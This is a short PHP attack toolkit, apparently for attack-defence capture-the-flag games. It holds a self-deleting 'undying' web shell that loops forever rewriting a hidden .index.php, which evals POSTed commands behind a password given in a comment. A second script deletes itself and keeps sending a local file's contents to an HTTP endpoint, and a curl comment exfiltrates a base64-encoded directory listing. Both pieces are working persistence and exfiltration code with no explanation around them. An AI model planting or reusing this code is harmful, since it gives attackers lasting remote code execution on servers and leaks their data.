不死马.php
<?php 
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = './.index.php';
$code = '<?php if(md5($_POST["pass"])=="3a50065e1709acc47ba0c9238294364f"){@eval($_POST[a]);} ?>';
//eval(base64_decode($a));
//pass=Sn3rtf4ck 马儿用法：fuckyou.php?pass=Sn3rtf4ck&a=command
while (1){
	file_put_contents($file,$code);
	usleep(5000);
}
?>

回传flag
//curl http://localhost:3333/429/`base64 -i $(ls ./)`
<?php
#光回传flag
unlink($_SERVER['SCRIPT_FILENAME']);
ignore_user_abort(true);
set_time_limit(0);
while (true) {
    $x = file_get_contents('/Users/moxiaoxi/Desktop/1.txt');//`command`
	file_get_contents('http://127.0.0.1:20002/test.php?zmkm=qqq&qqq='.$x);
    sleep(1);
}
?>
	
